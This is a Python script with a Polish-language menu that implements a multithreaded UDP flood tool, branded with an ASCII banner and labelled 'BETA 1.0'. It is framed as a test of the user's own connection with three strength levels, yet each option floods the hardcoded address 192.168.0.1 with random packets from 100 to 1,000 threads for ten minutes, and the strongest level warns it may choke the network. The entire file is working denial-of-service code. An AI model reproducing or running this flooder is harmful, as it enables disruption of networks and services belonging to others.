import os
import platform
import socket
import threading
import time

# ANSI kolory
GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
BLUE = "\033[94m"
RESET = "\033[0m"


def enable_ansi_windows():
    if platform.system().lower() == "windows":
        os.system("")


def clear():
    os.system("cls" if platform.system().lower() == "windows" else "clear")


def print_banner():
    clear()
    print(f"""{RED}


██   ██ ███████ ██████   ██████  ██████  ███████  ██ ██████  
██   ██ ██      ██   ██ ██    ██      ██      ██ ███      ██ 
███████ █████   ██████  ██    ██  █████      ██   ██  █████  
██   ██ ██      ██   ██ ██    ██ ██         ██    ██ ██      
██   ██ ███████ ██   ██  ██████  ███████    ██    ██ ███████ 
                                                             
                                                             
 

{RESET}""")
    print(f"{YELLOW}⭐ BETA 1.0{RESET}\n")


class UDPMultiFlood:
    def __init__(self, ip, port=80, packet_size=1024, threads=50, duration=10):
        self.ip = ip
        self.port = port
        self.packet_size = packet_size
        self.threads = threads
        self.duration = duration
        self.stop_flag = False
        self.packets_sent = 0
        self.lock = threading.Lock()

    def flood_thread(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        data = os.urandom(self.packet_size)
        end_time = time.time() + self.duration
        while not self.stop_flag and time.time() < end_time:
            try:
                sock.sendto(data, (self.ip, self.port))
                with self.lock:
                    self.packets_sent += 1
            except Exception:
                pass
        sock.close()

    def start(self):
        print(
            f"{CYAN}⏳ Startuję flood UDP na {self.ip}:{self.port} przez {self.duration} sekund z {self.threads} wątkami...{RESET}")
        threads = []
        try:
            for _ in range(self.threads):
                t = threading.Thread(target=self.flood_thread, daemon=True)
                t.start()
                threads.append(t)

            start_time = time.time()
            while time.time() - start_time < self.duration:
                with self.lock:
                    count = self.packets_sent
                print(f"{GREEN}📦 Pakiety wysłane: {count}{RESET}", end="\r")
                time.sleep(0.5)
        except KeyboardInterrupt:
            print(f"\n{YELLOW}❗ Przerwano działanie przez użytkownika.{RESET}")
        finally:
            self.stop_flag = True
            for t in threads:
                t.join()
            print(f"\n{YELLOW}✅ Zakończono. Łącznie wysłano {self.packets_sent} pakietów.{RESET}")


def main():
    enable_ansi_windows()
    print_banner()

    # IP testowe (lokalne)
    ip = "192.168.0.1"

    print(f"{CYAN}Wybierz siłę testu swojego łącza:{RESET}")
    print(f"  {GREEN}1.{RESET} Słaby  — dla słabszych komputerów")
    print(f"  {YELLOW}2.{RESET} Średni — stabilne testowanie")
    print(f"  {RED}3.{RESET} Silny  — może na chwilę przyciąć sieć\n")

    choice = input("Wpisz 1, 2 lub 3 i naciśnij Enter: ").strip()

    if choice == "1":
        flood = UDPMultiFlood(ip=ip, port=80, packet_size=4000, threads=100, duration=600)
    elif choice == "2":
        flood = UDPMultiFlood(ip=ip, port=80, packet_size=8000, threads=550, duration=600)
    elif choice == "3":
        flood = UDPMultiFlood(ip=ip, port=80, packet_size=10250, threads=1000, duration=600)
    else:
        print(f"{RED}❌ Nieprawidłowy wybór. Zakończono.{RESET}")
        return

    # Usunięto pingowanie — od razu startujemy flood
    flood.start()


if __name__ == "__main__":
    main()
